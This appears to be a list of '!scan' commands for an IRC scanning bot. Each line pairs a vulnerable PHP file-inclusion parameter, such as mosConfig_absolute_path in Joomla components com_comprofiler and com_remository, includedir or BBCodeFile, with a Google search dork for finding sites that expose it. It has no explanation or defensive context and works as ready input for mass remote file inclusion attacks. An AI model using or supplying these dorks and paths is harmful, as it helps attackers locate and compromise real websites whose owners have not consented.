!scan index.php?r= inurl:”index.php?r=*.php”
!scan index.php?menu= inurl:”net/index.php?menu=*.php”
!scan index.php?pag= inurl:”com/index.php?pag=*.php”
!scan solpot.html?body= allinurl: “solpot.html?body”
!scan port.php?content= inurl:port.php?content=*.php”
!scan index0.php?show= inurl:index0.php?show=*.php”
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
!scan content.php?page= inurl:”*content.php?page=*.php